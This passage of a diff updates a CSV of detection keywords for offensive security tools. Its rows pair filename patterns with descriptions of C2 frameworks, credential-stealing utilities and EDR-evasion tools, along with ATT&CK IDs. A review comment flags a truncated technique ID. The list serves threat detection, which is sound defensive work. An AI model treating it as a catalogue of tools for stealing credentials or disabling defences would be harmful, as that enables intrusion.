movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
-"*Sharp_v4_x86*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Sharp_v4_x64*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Sharp_v4_x86*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*sharpadidnsdump.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpAdidnsdumpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpAdidnsdumpMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpAllowedToAct.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sharpapplocker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*SharpAppLocker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpAllowedToAct.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpapplocker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpAppLocker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpAzbelt-main*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*SharpBlackout* -p *","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackOut.csproj*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" 
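Review bot: The `metadata_tool_techniques` field in the added `*SharpAllowedToAct.exe*` and `*SharpAppLocker.exe*` sharpcollection rows ends in `T1247 - T12`, a truncated ATT&CK ID that this star-count update carries over unchanged; the added `*SharpBypassUAC.exe*` row in the next hunk has the same tail. A consumer that splits this field on ` - ` to map keyword hits onto ATT&CK techniques gets a token that resolves to nothing, so coverage for these rows is silently misreported. The intended ID cannot be recovered from the diff, so either restore it from the original source or drop the fragment so the field ends `... - T1227 - T1247`. If these rows are refreshed by a script, as the count-only changes suggest, it could reject any technique token that is not `T` plus four digits with an optional `.NNN` sub-technique, which would catch this on the next run.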
@@ -16506,7 +16689,7 @@ "*SharpBlock.exe*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBlock.sln*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBypassUAC*","offensive_tool_keyword","AD exploitation cheat sheet","Use SharpBypassUAC e.g. from a CobaltStrike beacon","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*SharpBypassUAC.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpBypassUAC.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpC2 *","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2*.cs*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2*.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 
@@ -16518,73 +16701,73 @@ "*SharpC2Webhook*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpCalendar.exe*","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" "*SharpCat.exe*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. 
For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" -"*SharpChisel.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpChrome backupkey*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpChrome.cs*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpChrome.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sharpchromium *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpChisel.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome backupkey*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome.cs*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpchromium *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*SharpChromium.csproj*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpChromium.exe*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" -"*SharpChromium.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChromium.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpChromium.sln*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpChromium-master*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpClipHistory*","offensive_tool_keyword","SharpClipHistory","SharpClipHistory is a .NET 4.5 application written in C# that can be used to read the contents of a users clipboard history in Windows 10 starting from the 1809 Build.","T1115 - T1113 - T1015 - T1053 - T1059","TA0003 - TA0007","N/A","N/A","Information Gathering","https://github.com/FSecureLABS/SharpClipHistory","1","1","N/A","N/A","2","179","36","2020-01-23T13:39:13Z","2019-04-25T22:17:08Z" "*sharpcloud.cna*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google 
Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud.csproj*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud.exe*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" -"*SharpCloud.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive 